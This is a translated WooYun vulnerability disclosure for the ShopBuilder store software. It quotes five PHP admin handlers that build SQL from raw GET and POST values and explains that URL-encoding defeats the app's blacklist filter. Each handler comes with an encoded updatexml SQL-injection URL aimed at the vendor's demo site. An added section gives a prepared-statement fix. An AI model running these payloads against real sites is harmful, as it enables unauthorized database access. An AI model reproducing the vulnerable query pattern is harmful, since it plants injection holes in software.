
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-072822

Title: ShopBuilder online store, GET-type SQL injection bundle (1~5), tested successfully on the vendor's official demo site

Vendor: shop-builder.cn

Author: roker

Submitted: 2014-09-29 18:48

Fix deadline: 2014-12-28 18:50

Published: 2014-12-28 18:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-09-29: Details sent to the vendor, awaiting vendor response
2014-09-30: Vendor confirmed; details disclosed to the vendor only
2014-10-03: Details opened to third-party security partners
2014-11-24: Details opened to core white hats and domain experts
2014-12-04: Details opened to regular white hats
2014-12-14: Details opened to intern white hats
2014-12-28: Details disclosed to the public

Brief description:

See title.

Detailed description:

First, GET-type input does go through a filter (the application's own code):

    if(inject_check($_SERVER["REQUEST_URI"]))
    {
        die('Invalid URL !');
    }

    // blacklist regex applied to the raw request URI
    function inject_check($sql)
    {
        return preg_match("/(select|insert|delete|\.\.\/|\.\/|union|into|load_file|outfile|\'|%27|{|\()/i", $sql);// filtering
    }


This filter can be ignored, however: URL-encoding the payload bypasses it, because the regex is matched against the raw REQUEST_URI, which PHP does not URL-decode before the check.

#1
module\vote\admin\vote.php (reviewers, look closely: this is not the same as WooYun: ShopBuilder商城 v5.6.1 sql注入 #1)
line 49

    if(!empty($_GET['vid']))
    {
        // $_GET[vid] is interpolated into the SQL string unchanged
        $sql="select * from ".NEWSVOTE." where id=$_GET[vid]";
        echo $sql;
        $db->query($sql);
        $re=$db->fetchRow();
        $vote=explode('|',$re['votetext']);
        for($i=0;$i<count($vote);$i++)
        {
            $vote[$i]=explode(',',$vote[$i]);
        }
    }


vid is not filtered.
Test against the vendor's site: http://www.a5shop.cn/?m=vote/admin&s=vote&vid=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29

[Screenshot: 1.jpg]


#2
module\vote\admin\vote_list.php

    if(!empty($_GET['did']))
    {
        $id=$_GET['did'];   // raw GET value, no validation
    }
    if(!empty($id))
    {
        if($submit==lang_show('del') or !empty($_GET['did']))
        {
            $sql="delete from ".NEWSVOTE." where id in ($id)";
        }
        if($submit==lang_show('bres'))
            $sql="update ".NEWSVOTE." set type=1 where id in ($id)";
        if($submit==lang_show('nbres'))
            $sql="update ".NEWSVOTE." set type=0 where id in ($id)";
        $db->query($sql);
    }


did is not filtered; it is assigned to $id and then used directly in the query.
Test against the vendor's site:
http://www.a5shop.cn/?m=vote/admin&s=vote_list&did=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29

#3
module\news\admin\news.php
line 92

    if($_POST['act']=='edit' and !empty($_GET['newsid']))
    {
        // every $_POST[...] column and $_GET[newsid] are interpolated unescaped
        $sql="update ".NEWSD." set title='$_POST[title]',ftitle='$_POST[ftitle]',keyboard='$_POST[key]',titleurl='$_POST[links]', isrec='$_POST[rec]', istop='$_POST[istop]',ispass='$_POST[pass]',onclick='$_POST[onclick]',titlefont='$titlefont',uptime='$time',smalltext='$_POST[smalltext]',writer='$_POST[writer]',source='$_POST[source]',titlepic='$pname',ispic='$ispic',isgid='$_POST[group]',ispl='$_POST[closepl]',userfen='$_POST[userfen]',newstempid='$_POST[newstempid]',imgs_url='$imgs_url',videos_url='$video_url',vote='$vote',admin='$_POST[admin]',special='$special',lastedittime='".time()."' where nid= $_GET[newsid]";
        $re=$db->query($sql);
        $sql="update ".NEWSDATA." set con='$_POST[body]' where nid= $_GET[newsid]";
        // ... remainder of the handler not shown in the original excerpt
    }


newsid is not filtered.
Test against the vendor's site:
http://www.a5shop.cn/?m=news/admin&s=news&newsid=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29

#4
module\news\admin\newslist.php
at the beginning of the file

    if(!empty($_GET['did']))
    {
        $id=$_GET['did'];   // raw GET value, no validation
    }
    if(!empty($id))
    {
        if($submit==lang_show('del') or !empty($_GET['did']))
        {
            $sql="delete from ".NEWSD." where nid in ($id)";
            $db->query($sql);
            $sql="delete from ".NEWSDATA." where nid in ($id)";
        }
        // ... remainder of the block not shown in the original excerpt
    }


Test against the vendor's site:
http://www.a5shop.cn/?m=news/admin&s=newslist&did=1%29%20and%201=updatexml%281,concat%280x5c,%28select%20user%28%29%29%29,1%29%23

#5
module\news\admin\newslist.php
line 37

    if($submit==lang_show('copy') and !empty($_GET['nclass']))
    {
        // each chk[] element and $_GET[nclass] go into the INSERT ... SELECT unescaped
        foreach($_GET['chk'] as $val)
        {
            $sql="INSERT ".NEWSD."(title,ftitle,keyboard,titleurl,isrec,istop,ispass,firsttitle,onclick,titlefont,uid,uptime,smalltext,writer,source,titlepic,ispic,isgid,ispl,userfen,newstempid,pagenum,imgs_url,videos_url,vote,special,classid,lastedittime) select title,ftitle,keyboard,titleurl,isrec,istop,ispass,firsttitle,onclick,titlefont,uid,uptime,smalltext,writer,source,titlepic,ispic,isgid,ispl,userfen,newstempid,pagenum,imgs_url,videos_url,vote,special,'$_GET[nclass]',lastedittime from ".NEWSD." where nid =$val";
            $db->query($sql);
            $id=$db->lastid();
            $sql="INSERT INTO ".NEWSDATA." (con,nid) select con,$id from ".NEWSDATA." where nid =$val";
            $re=$db->query($sql);
        }
    }


When nclass is non-empty and chk is an array, the values are passed straight into the database query.
Test against the vendor's site:
http://www.a5shop.cn/?m=news/admin&s=newslist&nclass=1&chk[]=1%29 and 1=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29%23

Proof of vulnerability:

[Screenshot: 1.jpg]

Suggested fix:

Filter the input.
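Added example (not ShopBuilder's code and not from the report author): a hardened rewrite of the five handlers above. Instead of a blacklist regex over REQUEST_URI, every id is validated as a positive integer and bound through a prepared statement, which covers all five cases because they share the same defect (an id or id list interpolated into a SQL string). `$pdo` is an assumed PDO connection; `NEWSVOTE`, `NEWSD` and `NEWSDATA` are the table-name constants from the vulnerable snippets; the #3 and #5 column lists are shortened to show the pattern.

```php
<?php
// Added example, not project code. Assumes $pdo is a PDO connection
// (PDO::ATTR_EMULATE_PREPARES = false recommended) and that the
// NEWSVOTE / NEWSD / NEWSDATA constants hold the table names.

/** Return a positive integer id, or null if the value is anything else. */
function intId($value): ?int
{
    if (!is_scalar($value)) {
        return null;                       // arrays such as chk[]=... are rejected here
    }
    // FILTER_VALIDATE_INT rejects "11 and 1=..." outright rather than truncating it
    $id = filter_var(trim((string)$value), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Validate "1,2,3" or an array of ids into a list of integers; empty list on any bad element. */
function intIdList($value): array
{
    $parts = is_array($value) ? $value : explode(',', (string)$value);
    $ids = [];
    foreach ($parts as $p) {
        $id = intId($p);
        if ($id === null) {
            return [];                     // one bad element invalidates the whole list
        }
        $ids[] = $id;
    }
    return array_values(array_unique($ids));
}

/** One "?" placeholder per id for an IN (...) clause. */
function placeholders(array $ids): string
{
    return implode(',', array_fill(0, count($ids), '?'));
}

// #1 vote.php: vid is bound as an integer instead of interpolated
$vid = intId($_GET['vid'] ?? null);
if ($vid !== null) {
    $stmt = $pdo->prepare("select * from " . NEWSVOTE . " where id = ?");
    $stmt->execute([$vid]);
    $re = $stmt->fetch(PDO::FETCH_ASSOC);
}

// #2 vote_list.php and #4 newslist.php: did becomes a validated IN list
$ids = intIdList($_GET['did'] ?? '');
if ($ids !== []) {
    $stmt = $pdo->prepare("delete from " . NEWSVOTE . " where id in (" . placeholders($ids) . ")");
    $stmt->execute($ids);
}

// #3 news.php: newsid in WHERE, and every $_POST column bound the same way
// (only title shown; the remaining columns follow the same pattern)
$newsid = intId($_GET['newsid'] ?? null);
if (($_POST['act'] ?? '') === 'edit' && $newsid !== null) {
    $stmt = $pdo->prepare("update " . NEWSD . " set title = ?, lastedittime = ? where nid = ?");
    $stmt->execute([$_POST['title'] ?? '', time(), $newsid]);
}

// #5 newslist.php: nclass and each chk[] element validated before INSERT ... SELECT
$nclass = intId($_GET['nclass'] ?? null);
if ($nclass !== null) {
    $copy = $pdo->prepare(
        "INSERT INTO " . NEWSD . " (title, classid, lastedittime) "
        . "select title, ?, lastedittime from " . NEWSD . " where nid = ?"
    );
    $copyData = $pdo->prepare(
        "INSERT INTO " . NEWSDATA . " (con, nid) select con, ? from " . NEWSDATA . " where nid = ?"
    );
    foreach (intIdList($_GET['chk'] ?? []) as $val) {
        $copy->execute([$nclass, $val]);
        $newId = (int)$pdo->lastInsertId();
        $copyData->execute([$newId, $val]);
    }
}
```

The design point is that validation happens on the decoded, per-parameter value ($_GET, $_POST), not on the raw URI, so the encoding trick the report uses has nothing to bypass; the prepared statement then guarantees the value can never change the query structure even if validation is later loosened.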

Copyright notice: when reposting, please credit roker@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2014-09-30 09:15

Vendor reply:

Fixed in the new version.

Latest status:

None